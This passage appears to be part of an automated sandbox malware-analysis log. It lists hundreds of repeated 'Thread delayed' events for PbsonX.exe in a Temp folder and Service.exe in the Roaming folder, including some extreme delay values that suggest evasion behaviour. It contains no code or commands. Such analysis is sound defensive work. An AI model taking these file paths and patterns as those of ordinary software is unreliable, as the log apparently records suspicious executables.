Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599639
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599531
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599420
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599312
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598859
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598750
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598640
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598417
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598312
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598134
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598025
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597577
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597469
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597031
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596813
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596594
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596484
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596374
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596156
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596047
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595938
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595813
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595688
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595563
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595384
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595065
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594891
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594765
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594654
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594544
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594390
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594258
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594016
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593844
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593625
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593507
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593390
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593281
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593149
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593047
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592937
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592819
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599657
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599405
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599297
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599172
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599063
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598938
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598827
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598719
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598579
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598454
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598342
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598233
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598072
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597963
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597297
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597188
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597063
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596938
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596813
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596688
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596579
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596454
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596329
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596204
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596079
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595954
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595829
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595704
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595579
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595438
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594985
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594829
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594688
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594563
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594439
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594313
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594196
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593954
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593782
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593563
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593445
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593328
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593219
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593087
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592969
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592859
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592747
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592233
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592076
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 591933
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 591828
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599563
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599078
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598844
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598735
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598484
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598373
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598265
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598088
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597978
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597641
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597516
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597407
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597282
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597157
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597032
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596797
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596688
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596563
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596453
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596343
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596125
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596016
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595779
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595672
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595563
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595338
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595018
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594719
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594608
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594497
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594345
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594211
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593969
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593798
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593578
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593460
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593344
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593234
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593103
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593000
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592891
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592772
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592249
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592079
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599640
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599531
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599420
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599312
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598859
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598750
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598641
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598417
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598295
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598134
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598025
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597688
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597577
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597469
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597344
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597234
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597125
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597016
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596907
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596782
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596657
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596532
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596422
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596313
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596188
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596063
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595938
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595813
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595703
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595594
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595385
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595065
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594766
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594655
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594546
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594391
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594258
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594016
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593844
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593625
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593507
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593390
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593281
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593150
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593047
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592922
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592809
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592295
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592139
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599867
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599750
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599630
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599500
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599391
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599266
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599156
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598971
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598840
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598469
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598344
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596094
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595840
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595733
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595516
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595352
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595235
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594976
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594844
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594657
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594372
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594243
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594114
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593985
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593844
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593734
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593020
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 592813
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 592453
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 592125
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591984
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591855
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591735
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591625
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591500
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591357
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591250
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591140
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599867
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599749
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599630
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599500
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599390
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599280
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599171
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598970
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598839
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598468
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598358
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598249
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598031
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597921
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597807
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597702
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597374
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597155
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596718
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596129
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595984
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595855
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595749
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595530
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595396
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595265
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595145
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594844
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594372
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594242
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594113
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593984
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593859
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593747
